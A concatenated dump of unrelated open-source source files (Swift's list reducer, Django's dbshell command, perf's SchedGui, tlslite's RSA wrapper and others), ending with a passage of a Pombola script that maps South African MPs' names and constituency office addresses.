found = False
for node in self.nodes[0].getpeerinfo():
if node['addr'] == url.hostname+":"+str(p2p_port(1)):
found = True
assert(found)
if __name__ == '__main__':
NodeHandlingTest ().main ()
| mit |
quanvm009/codev7 | openerp/addons/project_timesheet/report/__init__.py | 441 | 1063 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import task_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
xwu/swift | utils/bug_reducer/bug_reducer/list_reducer.py | 12 | 7332 | from __future__ import print_function
import random
TESTRESULT_NOFAILURE = "NoFailure"
TESTRESULT_KEEPSUFFIX = "KeepSuffix"
TESTRESULT_KEEPPREFIX = "KeepPrefix"
TESTRESULTS = set([TESTRESULT_NOFAILURE, TESTRESULT_KEEPSUFFIX,
TESTRESULT_KEEPPREFIX])
class ListReducer(object):
"""Reduce lists of objects. Inspired by llvm bugpoint"""
def __init__(self, lst):
self.target_list = lst
# Maximal number of allowed splitting iterations,
# before the elements are randomly shuffled.
self.max_iters_without_progress = 3
# Maximal number of allowed single-element trim iterations. We add a
# threshold here as single-element reductions may otherwise take a
# very long time to complete.
self.max_trim_iterations_without_back_jump = 3
self.shuffling_enabled = True
self.num_iters_without_progress = 0
self.mid_top = 0
self.max_iters = self.max_iters_without_progress
def _reset_progress(self):
self.max_iters = self.max_iters_without_progress
self.num_iters_without_progress = 0
def run_test(self, prefix, suffix):
raise RuntimeError("Abstract method")
def _should_continue(self, result):
if result == TESTRESULT_KEEPPREFIX:
# We are done, we have the base case and the base case fails.
if len(self.target_list) == 1:
return {'should_continue': False, 'result': True}
else:
# There is an error, and we can narrow it down further.
return {'should_continue': True, 'result': None}
if result == TESTRESULT_KEEPSUFFIX:
raise RuntimeError("ListReducer internal error: Selected empty "
"set!")
raise RuntimeError('Unknown test result: %s' % result)
def _test_shuffle_slow_converging_list(self):
if not self.shuffling_enabled or \
self.num_iters_without_progress <= self.max_iters_without_progress:
return
print("*** Testing shuffled set...")
shuffled_list = list(self.target_list)
random.shuffle(shuffled_list)
# TODO: Is this correct? I guess we are always doing something.
self.num_iters_without_progress = 0
# Check that the random shuffle does not lose the bug.
(result, _, _) = self.run_test(shuffled_list, [])
if result != TESTRESULT_KEEPPREFIX:
# If we fail here, disable any further shuffling...
self.shuffling_enabled = False
print("*** Shuffling hides the bug...")
return
self.mid_top = len(shuffled_list)
self.max_iters = self.max_iters + 2
print("*** Shuffling does not hide the bug...")
self.target_list = shuffled_list
def _test_prefix_suffix(self, mid, prefix, suffix):
(result, prefix, suffix) = self.run_test(prefix, suffix)
if result == TESTRESULT_KEEPSUFFIX:
# The property still holds. We can just drop the prefix
# elements, and shorten the list to the "kept" elements.
self.target_list = suffix
self.mid_top = len(self.target_list)
# Reset the progress threshold
self._reset_progress()
return False
if result == TESTRESULT_KEEPPREFIX:
# The predicate still holds, shorten the list to the prefix
# elements.
self.target_list = prefix
self.mid_top = len(self.target_list)
self._reset_progress()
return False
assert(result == TESTRESULT_NOFAILURE)
# The property does not hold. Some of the elements we removed must
# be necessary to maintain the property.
self.mid_top = mid
self.num_iters_without_progress = \
self.num_iters_without_progress + 1
return False
def _trim_target_list(self):
self.mid_top = len(self.target_list)
self.max_iters = self.max_iters_without_progress
# Binary split reduction loop
while self.mid_top > 1:
# If the loop doesn't make satisfying progress, try shuffling.
# The purpose of shuffling is to avoid the heavy tails of the
# distribution (improving the speed of convergence).
self._test_shuffle_slow_converging_list()
# Split the list into a prefix, suffix list and then run test on
# those.
mid = self.mid_top / 2
if not self._test_prefix_suffix(mid, self.target_list[:mid],
self.target_list[mid:]):
# If we returned false, then we did some sort of work and there
# was not an error, so continue.
continue
# Otherwise, the test routine signaled an error, so return True to
# signal error.
return True
# If we reach this point, return False, we have no further work we can
# do.
return False
def _trim_try_backjump_and_trim_suffix(self):
backjump_probability = 10
if len(self.target_list) <= 2:
return False
changed = True
trim_iters = 0
# Trimming loop
while changed:
changed = False
# If the binary split reduction loop made an unfortunate sequence
# of splits, the trimming loop might be left off with a huge
# number of remaining elements (large search space). Backjumping
# out of that search space and attempting a different split can
# significantly improve the convergence speed.
if random.randint(0, 100) < backjump_probability:
return True
# Check interior elements, using an offset to make sure we do not
# skip elements when we trim.
offset = 0
for i in range(1, len(self.target_list) - 1):
real_i = i + offset
test_list = self.target_list[real_i:]
(result, prefix, suffix) = self.run_test([], test_list)
if result == TESTRESULT_KEEPSUFFIX:
# We can trim the list!
self.target_list = test_list
offset = offset - 1
changed = True
if trim_iters >= self.max_trim_iterations_without_back_jump:
return False
trim_iters = trim_iters + 1
def reduce_list(self):
random.seed(0x6e5ea738) # Seed the random number generator
(result, self.target_list, kept) = self.run_test(self.target_list, [])
assert(result in TESTRESULTS)
(should_continue, result) = self._should_continue(result)
if not should_continue:
return result
# Now try to trim the list.
should_backjump = True
while should_backjump:
# If self._trim_target_list returns True, then we failed to
# reduce. Bail!
if self._trim_target_list():
return False
# Finally decide if we should back_jump
should_backjump = self._trim_try_backjump_and_trim_suffix()
# There are some failure and we've narrowed them down
return True
| apache-2.0 |
dhananjay92/servo | tests/wpt/web-platform-tests/html/tools/update_html5lib_tests.py | 125 | 5358 | import sys
import os
import hashlib
import urllib
import itertools
import re
import json
import glob
import shutil
try:
import genshi
from genshi.template import MarkupTemplate
from html5lib.tests import support
except ImportError:
print """This script requires the Genshi templating library and html5lib source
It is recommended that these are installed in a virtualenv:
virtualenv venv
source venv/bin/activate
pip install genshi
cd venv
git clone git@github.com:html5lib/html5lib-python.git html5lib
cd html5lib
git submodule init
git submodule update
pip install -e ./
Then run this script again, with the virtual environment still active.
When you are done, type "deactivate" to deactivate the virtual environment.
"""
TESTS_PATH = "html/syntax/parsing/"
def get_paths():
script_path = os.path.split(os.path.abspath(__file__))[0]
repo_base = get_repo_base(script_path)
tests_path = os.path.join(repo_base, TESTS_PATH)
return script_path, tests_path
def get_repo_base(path):
while path:
if os.path.exists(os.path.join(path, ".git")):
return path
else:
path = os.path.split(path)[0]
def get_expected(data):
data = "#document\n" + data
return data
def get_hash(data, container=None):
if container == None:
container = ""
return hashlib.sha1("#container%s#data%s"%(container.encode("utf8"),
data.encode("utf8"))).hexdigest()
def make_tests(script_dir, out_dir, input_file_name, test_data):
tests = []
innerHTML_tests = []
ids_seen = {}
print input_file_name
for test in test_data:
if "script-off" in test:
continue
is_innerHTML = "document-fragment" in test
data = test["data"]
container = test["document-fragment"] if is_innerHTML else None
assert test["document"], test
expected = get_expected(test["document"])
test_list = innerHTML_tests if is_innerHTML else tests
test_id = get_hash(data, container)
if test_id in ids_seen:
print "WARNING: id %s seen multiple times in file %s this time for test (%s, %s) before for test %s, skipping"%(test_id, input_file_name, container, data, ids_seen[test_id])
continue
ids_seen[test_id] = (container, data)
test_list.append({'string_uri_encoded_input':"\"%s\""%urllib.quote(data.encode("utf8")),
'input':data,
'expected':expected,
'string_escaped_expected':json.dumps(urllib.quote(expected.encode("utf8"))),
'id':test_id,
'container':container
})
path_normal = None
if tests:
path_normal = write_test_file(script_dir, out_dir,
tests, "html5lib_%s"%input_file_name,
"html5lib_test.xml")
path_innerHTML = None
if innerHTML_tests:
path_innerHTML = write_test_file(script_dir, out_dir,
innerHTML_tests, "html5lib_innerHTML_%s"%input_file_name,
"html5lib_test_fragment.xml")
return path_normal, path_innerHTML
def write_test_file(script_dir, out_dir, tests, file_name, template_file_name):
file_name = os.path.join(out_dir, file_name + ".html")
short_name = os.path.split(file_name)[1]
with open(os.path.join(script_dir, template_file_name)) as f:
template = MarkupTemplate(f)
stream = template.generate(file_name=short_name, tests=tests)
with open(file_name, "w") as f:
f.write(stream.render('html', doctype='html5',
encoding="utf8"))
return file_name
def escape_js_string(in_data):
return in_data.encode("utf8").encode("string-escape")
def serialize_filenames(test_filenames):
return "[" + ",\n".join("\"%s\""%item for item in test_filenames) + "]"
def main():
script_dir, out_dir = get_paths()
test_files = []
inner_html_files = []
if len(sys.argv) > 2:
test_iterator = itertools.izip(
itertools.repeat(False),
sorted(os.path.abspath(item) for item in
glob.glob(os.path.join(sys.argv[2], "*.dat"))))
else:
test_iterator = itertools.chain(
itertools.izip(itertools.repeat(False),
sorted(support.get_data_files("tree-construction"))),
itertools.izip(itertools.repeat(True),
sorted(support.get_data_files(
os.path.join("tree-construction", "scripted")))))
for (scripted, test_file) in test_iterator:
input_file_name = os.path.splitext(os.path.split(test_file)[1])[0]
if scripted:
input_file_name = "scripted_" + input_file_name
test_data = support.TestData(test_file)
test_filename, inner_html_file_name = make_tests(script_dir, out_dir,
input_file_name, test_data)
if test_filename is not None:
test_files.append(test_filename)
if inner_html_file_name is not None:
inner_html_files.append(inner_html_file_name)
if __name__ == "__main__":
main()
| mpl-2.0 |
meletakis/collato | lib/python2.7/site-packages/django/core/management/commands/dbshell.py | 329 | 1243 | from optparse import make_option
from django.core.management.base import BaseCommand, CommandError
from django.db import connections, DEFAULT_DB_ALIAS
class Command(BaseCommand):
help = ("Runs the command-line client for specified database, or the "
"default database if none is provided.")
option_list = BaseCommand.option_list + (
make_option('--database', action='store', dest='database',
default=DEFAULT_DB_ALIAS, help='Nominates a database onto which to '
'open a shell. Defaults to the "default" database.'),
)
requires_model_validation = False
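    # Example invocation (added for clarity, not part of the original file):
    #   python manage.py dbshell --database=default
    # which launches the command-line client (e.g. psql, mysql or sqlite3) for
    # the configured backend.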
def handle(self, **options):
connection = connections[options.get('database')]
try:
connection.client.runshell()
except OSError:
# Note that we're assuming OSError means that the client program
# isn't installed. There's a possibility OSError would be raised
# for some other reason, in which case this error message would be
# inaccurate. Still, this message catches the common case.
raise CommandError('You appear not to have the %r program installed or on your path.' % \
connection.client.executable_name)
| gpl-2.0 |
djmax81/android_kernel_samsung_exynos5433_LL | tools/perf/scripts/python/Perf-Trace-Util/lib/Perf/Trace/SchedGui.py | 12980 | 5411 | # SchedGui.py - Python extension for perf script, basic GUI code for
# traces drawing and overview.
#
# Copyright (C) 2010 by Frederic Weisbecker <fweisbec@gmail.com>
#
# This software is distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
try:
import wx
except ImportError:
raise ImportError, "You need to install the wxpython lib for this script"
class RootFrame(wx.Frame):
Y_OFFSET = 100
RECT_HEIGHT = 100
RECT_SPACE = 50
EVENT_MARKING_WIDTH = 5
def __init__(self, sched_tracer, title, parent = None, id = -1):
wx.Frame.__init__(self, parent, id, title)
(self.screen_width, self.screen_height) = wx.GetDisplaySize()
self.screen_width -= 10
self.screen_height -= 10
self.zoom = 0.5
self.scroll_scale = 20
self.sched_tracer = sched_tracer
self.sched_tracer.set_root_win(self)
(self.ts_start, self.ts_end) = sched_tracer.interval()
self.update_width_virtual()
self.nr_rects = sched_tracer.nr_rectangles() + 1
self.height_virtual = RootFrame.Y_OFFSET + (self.nr_rects * (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE))
# whole window panel
self.panel = wx.Panel(self, size=(self.screen_width, self.screen_height))
# scrollable container
self.scroll = wx.ScrolledWindow(self.panel)
self.scroll.SetScrollbars(self.scroll_scale, self.scroll_scale, self.width_virtual / self.scroll_scale, self.height_virtual / self.scroll_scale)
self.scroll.EnableScrolling(True, True)
self.scroll.SetFocus()
# scrollable drawing area
self.scroll_panel = wx.Panel(self.scroll, size=(self.screen_width - 15, self.screen_height / 2))
self.scroll_panel.Bind(wx.EVT_PAINT, self.on_paint)
self.scroll_panel.Bind(wx.EVT_KEY_DOWN, self.on_key_press)
self.scroll_panel.Bind(wx.EVT_LEFT_DOWN, self.on_mouse_down)
self.scroll.Bind(wx.EVT_PAINT, self.on_paint)
self.scroll.Bind(wx.EVT_KEY_DOWN, self.on_key_press)
self.scroll.Bind(wx.EVT_LEFT_DOWN, self.on_mouse_down)
self.scroll.Fit()
self.Fit()
self.scroll_panel.SetDimensions(-1, -1, self.width_virtual, self.height_virtual, wx.SIZE_USE_EXISTING)
self.txt = None
self.Show(True)
def us_to_px(self, val):
return val / (10 ** 3) * self.zoom
def px_to_us(self, val):
return (val / self.zoom) * (10 ** 3)
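# Illustrative note (not part of the original file): with the default zoom of
# 0.5, us_to_px(2000) == 1, i.e. a 2000-microsecond interval is drawn one pixel
# wide; px_to_us is the inverse mapping.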
def scroll_start(self):
(x, y) = self.scroll.GetViewStart()
return (x * self.scroll_scale, y * self.scroll_scale)
def scroll_start_us(self):
(x, y) = self.scroll_start()
return self.px_to_us(x)
def paint_rectangle_zone(self, nr, color, top_color, start, end):
offset_px = self.us_to_px(start - self.ts_start)
width_px = self.us_to_px(end - self.ts_start)
offset_py = RootFrame.Y_OFFSET + (nr * (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE))
width_py = RootFrame.RECT_HEIGHT
dc = self.dc
if top_color is not None:
(r, g, b) = top_color
top_color = wx.Colour(r, g, b)
brush = wx.Brush(top_color, wx.SOLID)
dc.SetBrush(brush)
dc.DrawRectangle(offset_px, offset_py, width_px, RootFrame.EVENT_MARKING_WIDTH)
width_py -= RootFrame.EVENT_MARKING_WIDTH
offset_py += RootFrame.EVENT_MARKING_WIDTH
(r, g, b) = color
color = wx.Colour(r, g, b)
brush = wx.Brush(color, wx.SOLID)
dc.SetBrush(brush)
dc.DrawRectangle(offset_px, offset_py, width_px, width_py)
def update_rectangles(self, dc, start, end):
start += self.ts_start
end += self.ts_start
self.sched_tracer.fill_zone(start, end)
def on_paint(self, event):
dc = wx.PaintDC(self.scroll_panel)
self.dc = dc
width = min(self.width_virtual, self.screen_width)
(x, y) = self.scroll_start()
start = self.px_to_us(x)
end = self.px_to_us(x + width)
self.update_rectangles(dc, start, end)
def rect_from_ypixel(self, y):
y -= RootFrame.Y_OFFSET
rect = y / (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE)
height = y % (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE)
if rect < 0 or rect > self.nr_rects - 1 or height > RootFrame.RECT_HEIGHT:
return -1
return rect
def update_summary(self, txt):
if self.txt:
self.txt.Destroy()
self.txt = wx.StaticText(self.panel, -1, txt, (0, (self.screen_height / 2) + 50))
def on_mouse_down(self, event):
(x, y) = event.GetPositionTuple()
rect = self.rect_from_ypixel(y)
if rect == -1:
return
t = self.px_to_us(x) + self.ts_start
self.sched_tracer.mouse_down(rect, t)
def update_width_virtual(self):
self.width_virtual = self.us_to_px(self.ts_end - self.ts_start)
def __zoom(self, x):
self.update_width_virtual()
(xpos, ypos) = self.scroll.GetViewStart()
xpos = self.us_to_px(x) / self.scroll_scale
self.scroll.SetScrollbars(self.scroll_scale, self.scroll_scale, self.width_virtual / self.scroll_scale, self.height_virtual / self.scroll_scale, xpos, ypos)
self.Refresh()
def zoom_in(self):
x = self.scroll_start_us()
self.zoom *= 2
self.__zoom(x)
def zoom_out(self):
x = self.scroll_start_us()
self.zoom /= 2
self.__zoom(x)
def on_key_press(self, event):
key = event.GetRawKeyCode()
if key == ord("+"):
self.zoom_in()
return
if key == ord("-"):
self.zoom_out()
return
key = event.GetKeyCode()
(x, y) = self.scroll.GetViewStart()
if key == wx.WXK_RIGHT:
self.scroll.Scroll(x + 1, y)
elif key == wx.WXK_LEFT:
self.scroll.Scroll(x - 1, y)
elif key == wx.WXK_DOWN:
self.scroll.Scroll(x, y + 1)
elif key == wx.WXK_UP:
self.scroll.Scroll(x, y - 1)
| gpl-2.0 |
shizhai/wprobe | build_dir/host/scons-2.1.0/build/lib.linux-i686-2.7/SCons/Tool/packaging/src_tarbz2.py | 21 | 1757 | """SCons.Tool.Packaging.tarbz2
The tarbz2 SRC packager.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/packaging/src_tarbz2.py 5357 2011/09/09 21:31:03 bdeegan"
from SCons.Tool.packaging import putintopackageroot
def package(env, target, source, PACKAGEROOT, **kw):
bld = env['BUILDERS']['Tar']
bld.set_suffix('.tar.bz2')
target, source = putintopackageroot(target, source, env, PACKAGEROOT, honor_install_location=0)
return bld(env, target, source, TARFLAGS='-jc')
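# Note (added for clarity, not part of the original file): TARFLAGS='-jc' asks
# the Tar builder to create (-c) a bzip2-compressed (-j) archive, matching the
# '.tar.bz2' suffix set above.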
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| gpl-2.0 |
geminy/aidear | oss/qt/qt-everywhere-opensource-src-5.9.0/qtwebengine/src/3rdparty/chromium/third_party/tlslite/tlslite/utils/openssl_rsakey.py | 200 | 4670 | # Author: Trevor Perrin
# See the LICENSE file for legal information regarding use of this file.
"""OpenSSL/M2Crypto RSA implementation."""
from .cryptomath import *
from .rsakey import *
from .python_rsakey import Python_RSAKey
#copied from M2Crypto.util.py, so when we load the local copy of m2
#we can still use it
def password_callback(v, prompt1='Enter private key passphrase:',
prompt2='Verify passphrase:'):
from getpass import getpass
while 1:
try:
p1=getpass(prompt1)
if v:
p2=getpass(prompt2)
if p1==p2:
break
else:
break
except KeyboardInterrupt:
return None
return p1
if m2cryptoLoaded:
class OpenSSL_RSAKey(RSAKey):
def __init__(self, n=0, e=0):
self.rsa = None
self._hasPrivateKey = False
if (n and not e) or (e and not n):
raise AssertionError()
if n and e:
self.rsa = m2.rsa_new()
m2.rsa_set_n(self.rsa, numberToMPI(n))
m2.rsa_set_e(self.rsa, numberToMPI(e))
def __del__(self):
if self.rsa:
m2.rsa_free(self.rsa)
def __getattr__(self, name):
if name == 'e':
if not self.rsa:
return 0
return mpiToNumber(m2.rsa_get_e(self.rsa))
elif name == 'n':
if not self.rsa:
return 0
return mpiToNumber(m2.rsa_get_n(self.rsa))
else:
raise AttributeError
def hasPrivateKey(self):
return self._hasPrivateKey
def _rawPrivateKeyOp(self, m):
b = numberToByteArray(m, numBytes(self.n))
s = m2.rsa_private_encrypt(self.rsa, bytes(b), m2.no_padding)
c = bytesToNumber(bytearray(s))
return c
def _rawPublicKeyOp(self, c):
b = numberToByteArray(c, numBytes(self.n))
s = m2.rsa_public_decrypt(self.rsa, bytes(b), m2.no_padding)
m = bytesToNumber(bytearray(s))
return m
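# Sketch of the arithmetic above (illustrative, not part of the original
# file): with m2.no_padding these are textbook RSA operations, i.e. the
# private op computes pow(m, d, n) and the public op computes pow(c, e, n),
# carried out by OpenSSL via rsa_private_encrypt / rsa_public_decrypt.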
def acceptsPassword(self): return True
def write(self, password=None):
bio = m2.bio_new(m2.bio_s_mem())
if self._hasPrivateKey:
if password:
def f(v): return password
m2.rsa_write_key(self.rsa, bio, m2.des_ede_cbc(), f)
else:
def f(): pass
m2.rsa_write_key_no_cipher(self.rsa, bio, f)
else:
if password:
raise AssertionError()
m2.rsa_write_pub_key(self.rsa, bio)
s = m2.bio_read(bio, m2.bio_ctrl_pending(bio))
m2.bio_free(bio)
return s
def generate(bits):
key = OpenSSL_RSAKey()
def f():pass
key.rsa = m2.rsa_generate_key(bits, 3, f)
key._hasPrivateKey = True
return key
generate = staticmethod(generate)
def parse(s, passwordCallback=None):
# Skip forward to the first PEM header
start = s.find("-----BEGIN ")
if start == -1:
raise SyntaxError()
s = s[start:]
if s.startswith("-----BEGIN "):
if passwordCallback==None:
callback = password_callback
else:
def f(v, prompt1=None, prompt2=None):
return passwordCallback()
callback = f
bio = m2.bio_new(m2.bio_s_mem())
try:
m2.bio_write(bio, s)
key = OpenSSL_RSAKey()
if s.startswith("-----BEGIN RSA PRIVATE KEY-----"):
def f():pass
key.rsa = m2.rsa_read_key(bio, callback)
if key.rsa == None:
raise SyntaxError()
key._hasPrivateKey = True
elif s.startswith("-----BEGIN PUBLIC KEY-----"):
key.rsa = m2.rsa_read_pub_key(bio)
if key.rsa == None:
raise SyntaxError()
key._hasPrivateKey = False
else:
raise SyntaxError()
return key
finally:
m2.bio_free(bio)
else:
raise SyntaxError()
parse = staticmethod(parse)
| gpl-3.0 |
mysociety/pombola | pombola/south_africa/data/constituencies_and_offices/source_data/convert_to_import_json.py | 5 | 42555 | # *-* coding: utf-8
# Converts constituency files received from parties to the json format
# suitable for import. The intention is to minimise manual editing,
# although some manual editing is unavoidable.
# For ANC files the major change made is to remove PLOs (Parliamentary
# Liaison Officers) of ministers, as they are understood to be government
# officials rather than party officials, and there is no clear way to include them in
# Pombola at present (although this should be addressed in the future).
# Other parties' processed files have been manually restructured into
# the structure seen by this script.
# This script should be updated for each set of data received.
# Last updated: January 2015.
import distutils.spawn
from subprocess import check_output
import re
import json
import csv
from django.core.exceptions import ImproperlyConfigured
def ensure_executable_found(name):
if not distutils.spawn.find_executable(name):
raise ImproperlyConfigured("Can't find executable '{0}' which is needed by this code".format(name))
manual_name_corrections = {
u'Morutoa Rosalia Masefele Story': u'Masefele Rosalia Morutoa',
u'Mike Masutha': u'Michael Masutha',
u'Sibongiseni Mchunu': u'Sibongile Mchunu',
u'Omie Singh': u'Aumsensingh Singh',
u'Nathi Nhleko': u'Nkosinathi Nhleko',
u'Zet Luzipho': u'Sahlulele Luzipho',
u'Nonzwakazi Swartbooi': u'Gloria Nonzwakazi Swartbooi-Ntombela',
u'Emmanuel Kebby Maphotse': u'Kebby Maphatsoe',
u'Dipuo Letsatsi': u'Dipuo Bertha Letsatsi-Duba',
u'Thoko Didiza': u'Angela Thokozile Didiza',
u'Koena Mmanoko Elisabeth Masehela': u'Elizabeth Koena Mmanoko Masehela',
u'Ishmael Kgetjepe': u'Maaria Ishmael Kgatjepe',
u'Clara Dikgale': u'Masefako Clarah Dikgale',
u'Sheila Sithole-Shope': u'Sheila Coleen Nkhensani Shope-Sithole',
u'DD Mabuza': u'David Dabede Mabuza',
u'Pat Sibande': u'Mtikeni Patrick Sibande',
u'Timothy Khoza': u'Timothy Zanoxolo Matsebane Khoza',
u'Simon P Skhosana': u'Piet Simon Skhosana',
u'Friedah Nkadimeng': u'Mogotle Friddah Nkadimeng',
u'Cathy Dlamini': u'Landulile Cathrine Dlamini',
u'Vusi R. Shongwe': u'Vusumuzi Robert Shongwe',
u'Dudu Manana': u'Duduzile Promise Manana',
u'Thandi B Shongwe': u'Blessing Thandi Shongwe',
u'Rosinah Semenye': u'Machwene Rosina Semenya',
u'Pinky Phosa': u'Yvonne Nkwenkwezi Phosa',
u'Busi Coleman': u'Elsie Mmathulare Coleman',
u'Jabu Mahlangu': u'Jabulani Lukas Mahlangu',
u'Rhodah Mathebe': u'Rhoda Sazi Mathabe',
u'Motlashuping Msosa': u'Tekoetsile Consolation Motlashuping',
u'Tumi Moiloa': u'Boitumelo Theodora Moiloa',
u'Jeanette Nyathi': u'Ntebaleng Jeannete Nyathi',
u'Johni Steenkamp': u'Johanna Steenkamp',
u'Leon Basson': u'Leonard Jones Basson',
u'Manuel Simao De Freitas': u'Manuel Simão Franca De Freitas',
u'Anroux Johanna Marais': u'Anroux Johanna Du Toit Marais',
u'Elizabeth Van Lingen': u'Elizabeth Christina Van Lingen',
u'Belinda Bozzoli (Van Onselen)': u'Belinda Bozzoli',
u'Philly Mapulane': u'Mohlopi Phillemon Mapulane',
u'Kenny Mmoiemang': u'Mosimanegare Kenneth Mmoiemang',
u'Natasha Elsbe Louw': u'Elsabe Natasha Louw',
u'Fana Mokoena': u'Lehlohonolo Goodwill Mokoena',
u'Modikela Mathloko': u'Abinaar Modikela Matlhoko',
u'Mpho Ramakatsa': u'Ramakaudi Paul Ramakatsa',
u'Veronica Mente-Nqweniso': u'Ntombovuyo Veronica Nqweniso',
u'Asanda Matshobane': u'Asanda Matshobeni',
u'Zwelivelile Mandlesizwe Dalibhunga': u'Zwelivelile Mandlesizwe Dalibhunga Mandela',
u'Jacob Marule': u'Marule Otto Jacob',
u'Jack Matlala': u'Matlala Jack Lesiba',
u'Regina Mhawule': u'Makgabo Reginah Mhaule',
u'David Dube': u'Boy David Dube',
u'Hlomane Chauke': u'Hlomane Patrick Chauke',
u'Zoleka Capa-Langa': u'Zoleka Capa',
u'Henro Kruger': u'Hendrika Johanna Lodiwika Kruger',
u'Bob Mabaso': u'Xitlhangoma Mabasa',
u'Mtsi Alfred': u'Skuta Alfred Mtsi',
u'VV Windvoel': u'Victor Vusumuzi Zibuthe Windvoël',
u'Suzan Dantjie': u'Sussana Rebecca Tsebe',
u'Vauda': u'Younus Cassim Vawda',
u'Basson, Catherine': u'Catherine Basson',
u'Feni, Hegrico': u'Hegrico Feni',
u'Jack, Sizwe': u'Sizwe Jack'
}
manual_location_corrections = {
'48 Chaplain Street, Ngqeleni, 5140 (R63, Port St Johns Road)': 'Ngqeleni',
'Kuyga Comm. Hall, Green bushes, 6390': 'Greenbushes, Port Elizabeth, Eastern Cape',
'Nyandeni Municipality, Libode Town Hall, 5160': 'Libode',
'1 Main Street, Wilton Mkwayi Street, Middle drift, 5685(opposite SAPS)': 'SAPS, Middledrift',
'56 Marius Street Adelaide': 'Adelaide',
'206 Old OK Building, Ratlou Location, Thabanchu 9781': 'Thaba Nchu',
'57 Gemabok Avenues, 1st Floor Twin Cnr, Lenasia 1820 ': '57 Gemsbok Avenue, Lenasia',
'56 Kruger Street, Forum Building, Bronkhorspruit, 1020': '56 Kruger Street, Bronkhorstspruit',
'Office B59, Centurion Town Council, Cnr Rabie & Basen Rd, Liyleton, 0157': 'Cnr Rabie Road & Basen Road, Liyleton, 0157',
'99 8th Avenue, Cnr Alfred Nzo Street, Alexandra Multipurpose Centre, Alexandra,': '99 8th Ave, Alexandra, 2014',
'5th Floor Masa House, 12 New South Street, Gandhi Square, Mashalltown, 2001': '12 New South Street, Mashalltown, 2001',
'Mini Munitoria Cnr Mgadi & Komane, Attridgeville,0008': 'Cnr Mgadi & Komane, Attridgeville, 0008',
'Upper Floor 22 President Street, Focheville, 2515': '22 President Street, Fochville, 2515',
'2nd Floor Office, No. 6, 28 Charmachael 2nd Floor Office, No. 6, 28 Charmachael': ' Carmichael Street, Ventersdorp, 2710 South Africa',
'Shop No. 23 Corner De Kock Street, Sanlaam Centre, 8600': ' De Kock Street Vryburg 8600',
'524 Main Road, Caltex Service Station, Senwabarwana, 0740': 'Blouberg Local Municipality, Limpopo',
'Shop No 8 Nelson Mandela Street, City Square, Shop No 8 Nelson Mandela Street, City Square,': ' Nelson Mandela Street Lichtenburg 2740',
'Shop 10 Roma Centre, Racing Park, Killaney, 7441': '-33.813884,18.534536',
'Kaebetse Trading, 189 Groblersdall Road, Monsterlus,0470': '189 Groblersdall Road, Monsterlus, 0470',
'463 Belvedere & Beatrix Street, Acadia, 0083': '463 Belvedere Street, Arcadia, Pretoria 0083',
'DUMBERTON HOUSE 4TH FLOOR CHURCH STREET': '4th Floor Dumberton House, Church Street, Cape town, 8001 South Africa',
'771 Bombay Road, Truro Centre, Old Housing Offices, PMBurg, 3201': '771 Bombay Road, Pietermaritzburg 3201',
'78 De Korte & De Beer Strts, Mineralia Bld, Braamfontein': '78 De Korte & De Beer Streets, Mineralia Bld, Braamfontein, 2000',
'17 Arbee Drive, Office 1 MP Centre, Tongaat, 4068': 'Arbee Drive,Tongaat, 4068',
'No. 23 Indian Shopping Complex, Salamat, No. 23 Indian Shopping Complex, Salamat,': 'Bloemhof, Lekwa-Teemane Local Municipality, North West 2662',
'608,26 brown St Kakholo building': 'Brown St, Nelspruit, 1201 South Africa',
'Office 6A, Bushbuckridge, Shopping Complex, 1280': 'Bushbuckridge, Shopping Complex, 1280',
'Phesheya Kwenciba': 'Butterworth, 4960 South Africa',
'12 Chestnut Crescent, A M Centre, Marianhill, 3610': 'Chestnut Crescent, Marianhill, Durban 3610',
'Office No 26, Civic Centre Building, Malamulele Main Road, 0950': 'Civic Centre Building, Malamulele Main Road, 0950',
'138 Old Mutual Building, Unit F, Lebowakgomo, 0703': 'Cnr R518 and R517 Lebowakgomo, Limpopo ',
'Cnr Voortrekker & Main Street, Sancam Building, 8460': 'Cnr Voortrekker & Main Street, Kuruman, 8460',
'Community Hall Centre, Thembisa Section, Daantjie, 1200': 'Daantjie, 1200',
'SB Farrow': 'East London, 5201 South Africa',
'No. 1 Ebfin Centre, George Street, Athlone, 7766': 'George Street, Athlone, 7766',
